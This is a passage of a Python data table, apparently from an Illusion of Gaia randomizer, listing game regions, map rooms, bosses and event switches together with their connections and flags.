237: [False, [], 2, [3,12,1,b"\x00"], 0, "Mu: Map 101 (middle W)", [], False, [], [], [], [], [], [], [], []],
238: [False, [236], 2, [3,12,1,b"\x00"], 0, "Mu: Map 101 (middle E)", [], False, [], [], [], [], [], [], [], []],
239: [False, [], 2, [3,12,2,b"\x00"], 0, "Mu: Map 101 (bottom)", [], False, [], [], [], [], [], [], [], []],
240: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (pedestals)", [19, 19], False, [], [], [], [], [], [], [], []],
241: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (statues placed)", [], False, [], [], [], [], [], [], [], []], # might need an exit for this
242: [False, [], 2, [3,12,0,b"\x00"], 0, "Mu: Map 102 (statue get)", [], False, [], [], [], [], [], [], [], []],
243: [False, [244], 2, [3,12,0,b"\x00"], 0, "Mu: Boss Room (entryway)", [], False, [], [], [], [], [], [], [], []], # Might need to add an exit for this?
244: [False, [242,243], 2, [3,12,0,b"\x00"], 0, "Mu: Boss Room (main)", [], True, [], [], [], [], [], [], [], []],
245: [False, [212], 2, [3,12,0,b"\x00"], 0, "Mu: Map 95 (top, Slider exit)", [], False, [], [], [], [], [], [], [], []],
246: [False, [226], 2, [3,12,0,b"\x00"], 0, "Mu: Map 98 (top, Slider exit)", [], False, [], [], [], [], [], [], [], []],
247: [False, [231,511], 0, [3,12,0,b"\x00"], 0, "Mu: Water lowered 1", [], False, [], [], [], [], [], [], [], []],
248: [False, [232,512], 0, [3,12,0,b"\x00"], 0, "Mu: Water lowered 2", [], False, [], [], [], [], [], [], [], []],
# Angel Village
250: [False, [12], 1, [3,13,0,b"\x00"], 0, "Angel Village: Outside", [], True, [], [], [], [], [], [], [], []],
251: [False, [1], 2, [3,13,0,b"\x00"], 0, "Angel Village: Underground", [], False, [], [], [], [], [], [], [], []],
252: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 1", [], False, [], [], [], [], [], [], [], []],
253: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 2", [], False, [], [], [], [], [], [], [], []],
254: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Dance Hall", [], False, [], [], [], [], [], [], [], []],
255: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: DS Room", [], False, [], [], [], [], [], [], [], []],
#256: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Village: Room 3", [], False, [], [], [], [], [], [], [], []],
# Angel Dungeon
260: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 109", [], False, [], [], [], [], [], [], [], []],
261: [False, [278], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 110 (main)", [], False, [], [], [], [], [], [], [], []],
262: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 111", [], False, [], [], [], [], [], [], [], []],
263: [False, [279], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (main)", [], False, [], [], [], [], [], [], [], []],
264: [False, [263], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (slider)", [], False, [], [], [], [], [], [], [], []],
265: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (alcove)", [], False, [], [], [], [], [], [], [], []],
266: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 113", [], False, [], [], [], [], [], [], [], []],
267: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 114 (main)", [], False, [], [], [], [], [], [], [], []],
268: [False, [267], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 114 (slider exit)", [], False, [], [], [], [], [], [], [], []],
269: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (main)", [], False, [], [], [], [], [], [], [], []],
270: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (portrait room)", [], False, [], [], [], [], [], [], [], []],
271: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (side room)", [], False, [], [], [], [], [], [], [], []],
272: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (Ishtar's room)", [], False, [], [], [], [], [], [], [], []],
273: [False, [272], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 116 (Ishtar's chest)", [], False, [], [], [], [], [], [], [], []],
274: [False, [513], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Puzzle Room", [], False, [], [], [], [], [], [], [], []],
275: [False, [265], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (alcove slider)", [], False, [], [], [], [], [], [], [], []],
276: [False, [277], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (slider exit)", [], False, [], [], [], [], [], [], [], []],
277: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 115 (foyer)", [], False, [], [], [], [], [], [], [], []],
278: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 110 (past Draco)", [], False, [], [], [], [], [], [], [], []],
279: [False, [], 2, [3,13,0,b"\x00"], 0, "Angel Dungeon: Map 112 (past Draco)", [], False, [], [], [], [], [], [], [], []],
# Watermia
280: [False, [12], 1, [3,14,0,b"\x00"], 0, "Watermia: Main Area", [24], False, [], [], [], [], [], [], [], []],
#281: [False, [15,280], 0, [3,14,0,b"\x00"], 0, "Watermia: Bridge Man", [], False, [], [], [], [], [], [], [], []],
282: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: DS House", [], False, [], [], [], [], [], [], [], []],
283: [False, [1], 2, [3,14,0,b"\x00"], 0, "Watermia: Gambling House", [], False, [], [], [], [], [], [], [], []],
284: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: West House", [], False, [], [], [], [], [], [], [], []],
285: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: East House", [], False, [], [], [], [], [], [], [], []],
286: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: Lance's House", [], False, [], [], [], [], [], [], [], []],
287: [False, [], 2, [3,14,0,b"\x00"], 0, "Watermia: NW House", [], False, [], [], [], [], [], [], [], []],
288: [False, [280], 0, [3,14,0,b"\x00"], 0, "Watermia: Stablemaster", [], True, [], [], [], [], [], [], [], []],
# Great Wall
290: [False, [12], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 130", [], False, [], [], [], [], [], [], [], []],
291: [False, [292], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (NW)", [], False, [], [], [], [], [], [], [], []],
292: [False, [293], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (S)", [], False, [], [], [], [], [], [], [], []],
293: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 131 (NE)", [], False, [], [], [], [], [], [], [], []],
294: [False, [296], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (W)", [], False, [], [], [], [], [], [], [], []],
295: [False, [296], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (center)", [], False, [], [], [], [], [], [], [], []],
296: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 133 (E)", [], False, [], [], [], [], [], [], [], []],
297: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 134", [], False, [], [], [], [], [], [], [], []],
298: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 135 (W)", [], False, [], [], [], [], [], [], [], []],
299: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 135 (E)", [], False, [], [], [], [], [], [], [], []],
300: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 136 (W)", [], False, [], [], [], [], [], [], [], []],
301: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Map 136 (E)", [], False, [], [], [], [], [], [], [], []],
302: [False, [303], 2, [3,15,0,b"\x00"], 0, "Great Wall: Boss Room (entrance)", [], False, [], [], [], [], [], [], [], []],
303: [False, [], 2, [3,15,0,b"\x00"], 0, "Great Wall: Boss Room (exit)", [], False, [], [], [], [], [], [], [], []],
# Euro
310: [False, [13], 1, [4,16,0,b"\x00"], 0, "Euro: Main Area", [24], False, [], [], [], [], [], [], [], []],
311: [False, [310], 0, [4,16,0,b"\x00"], 0, "Euro: Stablemaster", [], True, [], [], [], [], [], [], [], []],
312: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Rolek Company", [], False, [], [], [], [], [], [], [], []],
313: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: West House", [], False, [], [], [], [], [], [], [], []],
314: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Rolek Mansion", [40], False, [], [], [], [], [], [], [], []],
315: [False, [314], 0, [4,16,0,b"\x00"], 0, "Euro: Ann", [], False, [], [], [], [], [], [], [], []],
316: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Guest Room", [], False, [], [], [], [], [], [], [], []],
317: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Central House", [], False, [], [], [], [], [], [], [], []],
318: [False, [1], 2, [4,16,0,b"\x00"], 0, "Euro: Jeweler House", [], False, [], [], [], [], [], [], [], []],
319: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Twins House", [], False, [], [], [], [], [], [], [], []],
320: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Hidden House", [], False, [], [], [], [], [], [], [], []],
321: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Shrine", [], False, [], [], [], [], [], [], [], []],
322: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Explorer's House", [], False, [], [], [], [], [], [], [], []],
323: [False, [324], 2, [4,16,0,b"\x00"], 0, "Euro: Store Entrance", [], False, [], [], [], [], [], [], [], []],
324: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Store Exit", [], False, [], [], [], [], [], [], [], []],
325: [False, [], 2, [4,16,0,b"\x00"], 0, "Euro: Dark Space House", [], False, [], [], [], [], [], [], [], []],
# Mt. Kress
330: [False, [13], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 160", [], False, [], [], [], [], [], [], [], []],
331: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 161 (E)", [], False, [], [], [], [], [], [], [], []],
332: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 161 (W)", [], False, [], [], [], [], [], [], [], []],
333: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (main)", [26], False, [], [], [], [], [], [], [], []],
334: [False, [333], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (S)", [], False, [], [], [], [], [], [], [], []],
335: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (NW)", [], False, [], [], [], [], [], [], [], []],
336: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 162 (SE)", [], False, [], [], [], [], [], [], [], []],
337: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 163", [], False, [], [], [], [], [], [], [], []],
338: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 164", [], False, [], [], [], [], [], [], [], []],
339: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (S)", [26], False, [], [], [], [], [], [], [], []],
340: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (NE)", [26], False, [], [], [], [], [], [], [], []],
341: [False, [338], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 165 (NW)", [], False, [], [], [], [], [], [], [], []],
342: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 166", [], False, [], [], [], [], [], [], [], []],
343: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 167", [], False, [], [], [], [], [], [], [], []],
344: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 168", [], False, [], [], [], [], [], [], [], []],
345: [False, [], 2, [4,17,0,b"\x00"], 0, "Mt. Kress: Map 169", [], False, [], [], [], [], [], [], [], []],
# Natives' Village
350: [False, [13], 1, [4,18,0,b"\x00"], 0, "Natives' Village: Main Area", [10], False, [], [], [], [], [], [], [], []],
351: [False, [350], 0, [4,18,0,b"\x00"], 0, "Natives' Village: Child Guide", [], True, [], [], [], [], [], [], [], []],
352: [False, [], 2, [4,18,0,b"\x00"], 0, "Natives' Village: West House", [], False, [], [], [], [], [], [], [], []],
353: [False, [], 2, [4,18,0,b"\x00"], 0, "Natives' Village: House w/Statues", [29], False, [], [], [], [], [], [], [], []],
354: [False, [353], 0, [4,18,0,b"\x00"], 0, "Natives' Village: Statues Awake", [], False, [], [], [], [], [], [], [], []],
# Ankor Wat
360: [False, [13], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 176", [], False, [], [], [], [], [], [], [], []],
361: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 177 (E)", [], False, [], [], [], [], [], [], [], []],
362: [False, [361], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 177 (W)", [], False, [], [], [], [], [], [], [], []],
363: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (S)", [], False, [], [], [], [], [], [], [], []],
364: [False, [363], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (center)", [], False, [], [], [], [], [], [], [], []],
365: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 178 (N)", [], False, [], [], [], [], [], [], [], []],
366: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 179 (E)", [], False, [], [], [], [], [], [], [], []],
367: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 179 (W)", [], False, [], [], [], [], [], [], [], []],
368: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 180", [], False, [], [], [], [], [], [], [], []],
369: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (N)", [], False, [], [], [], [], [], [], [], []],
370: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (center)", [], False, [], [], [], [], [], [], [], []],
371: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 181 (S)", [], False, [], [], [], [], [], [], [], []],
372: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 182", [], False, [], [], [], [], [], [], [], []],
373: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (S)", [], False, [], [], [], [], [], [], [], []],
374: [False, [373], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (NW)", [], False, [], [], [], [], [], [], [], []],
375: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 183 (NE)", [], False, [], [], [], [], [], [], [], []],
376: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 184 (S)", [], False, [], [], [], [], [], [], [], []],
377: [False, [376], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 184 (N)", [], False, [], [], [], [], [], [], [], []],
378: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 185", [], False, [], [], [], [], [], [], [], []],
379: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 186 (main)", [], False, [], [], [], [], [], [], [], []],
380: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 186 (NE)", [], False, [], [], [], [], [], [], [], []],
381: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (main)", [], False, [], [], [], [], [], [], [], []],
382: [False, [381], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (chest)", [], False, [], [], [], [], [], [], [], []],
383: [False, [381], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 187 (Dark Space)", [], False, [], [], [], [], [], [], [], []],
384: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (N bright)", [], False, [], [], [], [], [], [], [], []],
385: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (S bright)", [], False, [], [], [], [], [], [], [], []],
386: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (floor S)", [], False, [], [], [], [], [], [], [], []],
387: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (floor N)", [], False, [], [], [], [], [], [], [], []],
388: [False, [386], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 189 (platform)", [], False, [], [], [], [], [], [], [], []],
389: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 190 (E)", [], False, [], [], [], [], [], [], [], []],
390: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 190 (W)", [], False, [], [], [], [], [], [], [], []],
391: [False, [], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 191", [], False, [], [], [], [], [], [], [], []],
392: [False, [384], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (N)", [], False, [], [], [], [], [], [], [], []],
393: [False, [385], 2, [4,19,0,b"\x00"], 0, "Ankor Wat: Map 188 (S)", [], False, [], [], [], [], [], [], [], []],
# Dao
400: [False, [1,14], 1, [5,20,0,b"\x00"], 0, "Dao: Main Area", [], False, [], [], [], [], [], [], [], []],
401: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: NW House", [], False, [], [], [], [], [], [], [], []],
402: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: Neil's House", [], False, [], [], [], [], [], [], [], []],
403: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: Snake Game", [], False, [], [], [], [], [], [], [], []],
404: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: SW House", [], False, [], [], [], [], [], [], [], []],
405: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: S House", [], False, [], [], [], [], [], [], [], []],
406: [False, [], 2, [5,20,0,b"\x00"], 0, "Dao: SE House", [], False, [], [], [], [], [], [], [], []],
# Pyramid
410: [False, [14], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (main)", [], False, [], [], [], [], [], [], [], []],
411: [False, [410], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (behind orbs)", [], False, [], [], [], [], [], [], [], []],
412: [False, [413], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (hidden platform)", [], False, [], [], [], [], [], [], [], []],
413: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (bottom)", [], False, [], [], [], [], [], [], [], []],
414: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Entrance (boss entrance)", [], False, [], [], [], [], [], [], [], []],
415: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph room", [30, 31, 32, 33, 34, 35, 38], False, [], [], [], [], [], [], [], []],
416: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 206 (E)", [], False, [], [], [], [], [], [], [], []],
417: [False, [416], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 206 (W)", [], False, [], [], [], [], [], [], [], []],
418: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 207 (NE)", [], False, [], [], [], [], [], [], [], []],
419: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 207 (SW)", [], False, [], [], [], [], [], [], [], []],
420: [False, [421], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 208 (N)", [], False, [], [], [], [], [], [], [], []],
421: [False, [420], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 208 (S)", [], False, [], [], [], [], [], [], [], []],
422: [False, [423], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 209 (W)", [], False, [], [], [], [], [], [], [], []],
423: [False, [422,411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 209 (E)", [], False, [], [], [], [], [], [], [], []],
424: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 210", [], False, [], [], [], [], [], [], [], []],
425: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 211", [], False, [], [], [], [], [], [], [], []],
426: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (N)", [], False, [], [], [], [], [], [], [], []],
427: [False, [426], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (center)", [], False, [], [], [], [], [], [], [], []],
428: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (SE)", [], False, [], [], [], [], [], [], [], []],
429: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 212 (SW)", [], False, [], [], [], [], [], [], [], []],
430: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 213", [], False, [], [], [], [], [], [], [], []],
431: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (NW)", [], False, [], [], [], [], [], [], [], []],
432: [False, [431], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (NE)", [], False, [], [], [], [], [], [], [], []],
433: [False, [431,434], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (SE)", [], False, [], [], [], [], [], [], [], []],
434: [False, [433], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 214 (SW)", [], False, [], [], [], [], [], [], [], []],
435: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 215 (main)", [], False, [], [], [], [], [], [], [], []],
436: [False, [437], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 216 (N)", [], False, [], [], [], [], [], [], [], []],
437: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 216 (S)", [], False, [], [], [], [], [], [], [], []],
438: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 217 (W)", [], False, [], [], [], [], [], [], [], []],
439: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 217 (E)", [], False, [], [], [], [], [], [], [], []],
440: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 219 (W)", [], False, [], [], [], [], [], [], [], []],
441: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 219 (E)", [], False, [], [], [], [], [], [], [], []],
442: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 1", [], False, [], [], [], [], [], [], [], []],
443: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 2", [], False, [], [], [], [], [], [], [], []],
444: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 3", [], False, [], [], [], [], [], [], [], []],
445: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 4", [], False, [], [], [], [], [], [], [], []],
446: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 5", [], False, [], [], [], [], [], [], [], []],
447: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyph 6", [], False, [], [], [], [], [], [], [], []],
448: [False, [], 2, [5,21,0,b"\x00"], 0, "Pyramid: Boss Room", [], True, [], [], [], [], [], [], [], []],
449: [False, [415,517], 0, [5,21,0,b"\x00"], 0, "Pyramid: Hieroglyphs Placed", [], False, [], [], [], [], [], [], [], []],
450: [False, [411], 2, [5,21,0,b"\x00"], 0, "Pyramid: Map 215 (past Killer 6)", [], False, [], [], [], [], [], [], [], []],
# Babel
460: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Foyer", [], False, [], [], [], [], [], [], [], []],
461: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 223 (bottom)", [], False, [], [], [], [], [], [], [], []],
462: [False, [461], 2, [6,22,0,b"\x00"], 0, "Babel: Map 223 (top)", [], False, [], [], [], [], [], [], [], []],
463: [False, [518,519],2, [6,22,0,b"\x00"], 0, "Babel: Map 224 (bottom)", [], False, [], [], [], [], [], [], [], []],
464: [False, [520,521],2, [6,22,0,b"\x00"], 0, "Babel: Map 224 (top)", [], False, [], [], [], [], [], [], [], []],
465: [False, [466], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (SW)", [], False, [], [], [], [], [], [], [], []],
466: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (NW)", [], False, [], [], [], [], [], [], [], []],
467: [False, [468], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (SE)", [], False, [], [], [], [], [], [], [], []],
468: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 225 (NE)", [], False, [], [], [], [], [], [], [], []],
469: [False, [470], 2, [6,22,0,b"\x00"], 0, "Babel: Map 226 (bottom)", [], False, [], [], [], [], [], [], [], []],
470: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 226 (top)", [], False, [], [], [], [], [], [], [], []],
471: [False, [522], 2, [6,22,0,b"\x00"], 0, "Babel: Map 227 (bottom)", [], False, [], [], [], [], [], [], [], []],
472: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Map 227 (top)", [], False, [], [], [], [], [], [], [], []],
473: [False, [], 2, [6,22,0,b"\x00"], 0, "Babel: Olman's Room", [], False, [], [], [], [], [], [], [], []],
474: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Castoth", [], False, [], [], [], [], [], [], [], []],
475: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Viper", [], False, [], [], [], [], [], [], [], []],
476: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Vampires", [], False, [], [], [], [], [], [], [], []],
477: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Sand Fanger", [], False, [], [], [], [], [], [], [], []],
478: [False, [], 0, [6,22,0,b"\x00"], 0, "Babel: Mummy Queen", [], False, [], [], [], [], [], [], [], []],
479: [False, [473], 0, [6,22,0,b"\x00"], 0, "Babel: Statue Get", [], False, [], [], [], [], [], [], [], []],
# Jeweler's Mansion
480: [False, [], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Main", [], False, [], [], [], [], [], [], [], []],
481: [False, [], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Behind Psycho Slider", [], False, [], [], [], [], [], [], [], []],
482: [False, [523], 2, [6,23,0,b"\x00"], 0, "Jeweler's Mansion: Solid Arm", [], False, [], [], [], [], [], [], [], []],
# Game End
490: [False, [500], 0, [0,0,0,b"\x00"], 0, "Kara Released", [], False, [], [], [], [], [], [], [], []],
491: [False, [], 0, [0,0,0,b"\x00"], 0, "Firebird", [], False, [], [], [], [], [], [], [], []],
492: [False, [491], 0, [0,0,0,b"\x00"], 0, "Dark Gaia/End Game", [], False, [], [], [], [], [], [], [], []],
# Event Switches
500: [False, [], 0, [0,0,0,b"\x00"], 0, "Kara ", [], False, [], [], [], [], [], [], [], []],
501: [False, [], 0, [0,0,0,b"\x00"], 0, "Lilly ", [], False, [], [], [], [], [], [], [], []],
502: [False, [], 0, [0,0,0,b"\x00"], 0, "Moon Tribe: Spirits Healed ", [], False, [], [], [], [], [], [], [], []],
503: [False, [], 0, [0,0,0,b"\x00"], 0, "Inca: Castoth defeated ", [], False, [], [], [], [], [], [], [], []],
504: [False, [], 0, [0,0,0,b"\x00"], 0, "Freejia: Found Laborer ", [], False, [], [], [], [], [], [], [], []],
505: [False, [], 0, [0,0,0,b"\x00"], 0, "Neil's Memory Restored ", [], False, [], [], [], [], [], [], [], []],
506: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 NW Switch ", [], False, [], [], [], [], [], [], [], []],
507: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 NE Switch ", [], False, [], [], [], [], [], [], [], []],
508: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 82 SE Switch ", [], False, [], [], [], [], [], [], [], []],
509: [False, [], 0, [0,0,0,b"\x00"], 0, "Sky Garden: Map 84 Switch ", [], False, [], [], [], [], [], [], [], []],
510: [False, [], 0, [0,0,0,b"\x00"], 0, "Seaside: Fountain Purified ", [], False, [], [], [], [], [], [], [], []],
511: [False, [], 0, [0,0,0,b"\x00"], 0, "Mu: Water Lowered 1 ", [], False, [], [], [], [], [], [], [], []],
512: [False, [], 0, [0,0,0,b"\x00"], 0, "Mu: Water Lowered 2 ", [], False, [], [], [], [], [], [], [], []],
513: [False, [], 0, [0,0,0,b"\x00"], 0, "Angel: Puzzle Complete ", [], False, [], [], [], [], [], [], [], []],
514: [False, [333,335], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 1 ", [], False, [], [], [], [], [], [], [], []],
515: [False, [339,340], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 2 ", [], False, [], [], [], [], [], [], [], []],
516: [False, [340,341], 0, [0,0,0,b"\x00"], 0, "Mt Kress: Drops used 3 ", [], False, [], [], [], [], [], [], [], []],
517: [False, [], 0, [0,0,0,b"\x00"], 0, "Pyramid: Hieroglyphs placed ", [], False, [], [], [], [], [], [], [], []],
518: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Castoth defeated ", [], False, [], [], [], [], [], [], [], []],
519: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Viper defeated ", [], False, [], [], [], [], [], [], [], []],
520: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Vampires defeated ", [], False, [], [], [], [], [], [], [], []],
521: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Sand Fanger defeated ", [], False, [], [], [], [], [], [], [], []],
522: [False, [], 0, [0,0,0,b"\x00"], 0, "Babel: Mummy Queen defeated ", [], False, [], [], [], [], [], [], [], []],
523: [False, [], 0, [0,0,0,b"\x00"], 0, "Mansion: Solid Arm defeated ", [], False, [], [], [], [], [], [], [], []],
# Misc
600: [False, [], 0, [0,0,0,b"\x00"], 0, "Freedan Access ", [], False, [], [], [], [], [], [], [], []],
